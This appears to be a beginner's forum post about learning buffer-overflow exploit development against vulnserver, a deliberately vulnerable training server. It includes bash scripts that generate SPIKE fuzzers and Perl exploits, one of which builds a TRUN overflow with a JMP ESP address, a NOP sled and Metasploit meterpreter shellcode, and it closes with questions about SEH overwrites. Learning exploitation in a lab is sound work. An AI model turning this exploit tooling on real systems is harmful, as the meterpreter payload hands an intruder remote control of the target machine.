redcodefinal

Members

Posts: 2

  1. Thank you very much! I went looking and the same guy who wrote some tutorials I used before made one on SEH; it's the same dude who made vulnserver.
  2. Hi there, I'm new and wanted to introduce myself. I am redcodefinal, I am 18 and live in California. Lately I have been learning about writing your own exploits using Steve Bradshaw's vulnserver. For those who are unfamiliar, it is a Telnet server that is purposely vulnerable to exploitation. I wrote 1 exploit for it, but I was hoping that someone could point me in the right direction for a couple of other exploitation methods that I am having trouble with. I will make these questions red so they are easier to find. I'll start by telling you what I learned so that way there is no miscommunication.

First off, we use spike, which is a general fuzzer, to push random buffer lengths into a command. We set the command that we want to use by setting the header. Next we just make a string variable to hold our random buffer value and we are off. (PS. I also wrote a BASH script to pump out these scripts because I am lazy.)

    #! /bin/bash
    # Generates a SPIKE script that fuzzes one command of the target.
    # $1 = output file, $2 = the command (the "header") to fuzz
    echo "Creates a fuzzer script for spike"
    echo "Usage: ./createfuzzscipt.sh [file] [command]"
    if [ $# -ne 2 ]
    then
        echo "WRONG ARGS!"
    else
        # s_readline() reads the banner, s_string() sends the fixed command,
        # s_string_variable() is the part SPIKE mutates on every iteration
        echo "s_readline();" > "$1"
        echo "s_string(\"$2 \");" >> "$1"
        echo "s_string_variable(\"COMMAND\");" >> "$1"
        cat "$1"
        echo "Happy Fuzzing"
    fi

Pretty simple so far. So next we fuzz the target command using spike's general_send_tcp program. If it crashes it is possible that it is vulnerable to attack. We use Wireshark to trace back the packets; vulnserver tells you if the command completed successfully or not. We look for TCP streams that don't have that at the end. I was doing this for the TRUN command, which happens to crash around 5000 bytes.

Now we need to write a Perl script to fuzz the target more intelligently. (I also wrote a BASH script to pump these out for me since, yet again, I am lazy.)

    #! /bin/bash
    # Generates a Perl script that sends HEADER + a Metasploit cyclic pattern,
    # so the value that lands in EIP can be traced back to a byte offset.
    # $1 = output file
    echo "This script will generate a Perl script used for general fuzzing"
    echo "Be nice to it, it's still in its beta stages"
    echo "USAGE: ./createplfuzz.sh [file]"
    echo " "
    if [ $# -ne 1 ]
    then
        echo "WRONG ARGS!"
        exit 1
    fi
    echo "What do you want the header to be?"
    read header
    echo "How big should the junk size be?"
    read junksize
    echo "IP address? (Say \$ARGV[0] to make it ask)"
    read ip
    echo "Port? (Say \$ARGV[1] to make it ask)"
    read port
    echo "Beginning Perl Script Maker"
    echo '#! /usr/bin/perl' > "$1"
    echo 'use IO::Socket;' >> "$1"
    echo "\$header = \"$header\";" >> "$1"
    # pattern_create.rb prints a non-repeating pattern of $junksize bytes
    junk=`/pentest/exploits/framework/tools/pattern_create.rb $junksize`
    echo "\$junk = \"$junk\";" >> "$1"
    echo '$socket = IO::Socket::INET->new(' >> "$1"
    echo 'Proto => "tcp",' >> "$1"
    echo "PeerAddr => \"$ip\"," >> "$1"
    echo "PeerPort => \"$port\"," >> "$1"
    echo ');' >> "$1"
    echo '$socket->recv($serverdata, 1024);' >> "$1"
    echo 'print $serverdata;' >> "$1"
    echo "\$socket->send(\$header.\$junk);" >> "$1"
    echo "DONE!"
    cat "$1"
    chmod +x "$1"
    echo "Happy Fuzzing"

So basically a quick look at what is going on. /pentest/exploits/framework/tools/pattern_create.rb $junksize runs a command that creates a traceable pattern, so if we overwrite EIP we can use this to trace EIP back and see how many bytes it took to crash it. The header is the command. Next I open OllyDbg on vulnserver and run vulnserver. Then I use my newly created fuzzing script to crash the program; I then take the value of EIP, pop it into the tracing program, and find that it is 2003 bytes in (I am still talking about the TRUN command). I pretty much understand everything up to this point, however I am a little fuzzy on the next part :/

Next we write our exploit. Basically we just fill in that 2003 character space with junk values (for debugging purposes I just use 'A' (\x41)). Next we grab a JMP ESP command from a dll it loads. The reason we do this is because most dlls won't be compiled with ASLR or SafeSEH. Beyond that I don't have a clue why we need this. This is one question I'd love answered.

Then we pack the value into Little Endian format. I understand what Little Endian format is but I don't understand why we need to pack the value like that. The line is $eip = pack('V', 0x625011af); Next we insert our shellcode (I wrote a script to just grab a meterpreter payload and insert it here. The script is at the end of this section). Next we make a NOP sled. I understand why we use it, however, the tutorial I used for this didn't explain how he arrived at the amount of NOPs he did (he used 20). How do you know how many NOPs to use for your sled? Lastly, we just send it over the wire. $socket->send($header.$junk.$eip.$nop.$shellcode);

Here is the Perl exploit generation script.

    #! /bin/bash
    # Generates a Perl script that sends HEADER + junk + EIP + NOP sled + shellcode.
    # $1 = output file
    echo "This script will generate a Perl script used for exploit dev and testing"
    echo "Be nice to it, it's still in its beta stages"
    echo "USAGE: ./createplexploit.sh [file]"
    echo " "
    if [ $# -ne 1 ]
    then
        echo "WRONG ARGS!"
        exit 1
    fi
    echo "What do you want the header to be?"
    read header
    echo "How big should the junk size be?"
    read junksize
    echo "What is the EIP value?"
    read eip
    echo "How many NOPs should the sled contain?"
    read nop
    echo "What payload should we use?"
    read payload
    echo "What encoder should we use?"
    read encoder
    echo "What options do we want for the payload? (You should know these)"
    read ploptions
    echo "IP address? (Say \$ARGV[0] to make it ask)"
    read ip
    echo "Port? (Say \$ARGV[1] to make it ask)"
    read port
    echo "Beginning Perl Script Maker"
    echo '#! /usr/bin/perl' > "$1"
    echo 'use IO::Socket;' >> "$1"
    echo "\$header = \"$header\";" >> "$1"
    # junk = "\x41" x N, eip = pack('V', 0x...) (little-endian dword), nop = "\x90" x N
    echo "\$junk = \"\\x41\" x $junksize;" >> "$1"
    echo "\$eip = pack('V', $eip);" >> "$1"
    echo "\$nop = \"\\x90\" x $nop;" >> "$1"
    # msfencode -t perl prints the payload as quoted "\x.." lines; keep only those
    shellcode=`msfpayload $payload $ploptions EXITFUNC=seh R | msfencode -t perl -e $encoder | grep -e '"'`
    echo "\$shellcode = $shellcode" >> "$1"
    echo '$socket = IO::Socket::INET->new(' >> "$1"
    echo 'Proto => "tcp",' >> "$1"
    echo "PeerAddr => \"$ip\"," >> "$1"
    echo "PeerPort => \"$port\"," >> "$1"
    echo ');' >> "$1"
    echo '$socket->recv($serverdata, 1024);' >> "$1"
    echo 'print $serverdata;' >> "$1"
    echo '$socket->send($header.$junk.$eip.$nop.$shellcode);' >> "$1"
    echo "DONE!"
    cat "$1"
    chmod +x "$1"
    echo "Happy Exploiting"

So the exploit works fine. Next, I wanted to try to make my own, however I hit some roadblocks. The commands I tried to use were GMON, KSTET, and GTER. All crashed when I used the spike fuzzer. However, I run into the same problem with each of them. Each one has an extremely small junk space. (GMON was untraceable, I don't think it's overwriting EIP; KSTET only had 66 bytes; GTER only has 147 bytes.) I noticed there isn't enough space for the shellcode. I first noticed it when I threw in some breakpoints (\xCC) at the beginning and end of the shellcode. It would hit the first one but not the 2nd. Later I just changed the shellcode in my script to \x42 x 1000, and I noticed not all of the Bs showed up. I know there are a couple of tricks to making shellcode execute from a different location, but the one I would prefer to use is overwriting the SEH chains. The SEH chains are an error handling address that gets called when the program crashes; the SEH chains in vulnserver point to ntdll. What is the proper method for overwriting SEH and putting my shellcode in a safe place so I can execute it?

List of questions:
  • How does the JMP ESP address from a non-ASLR dll help us execute shellcode?
  • Why do we need to pack the EIP address in little endian format?
  • How do we know how many NOPs to use in our sled?
  • What is the proper method for overwriting SEH and hiding our shellcode somewhere else?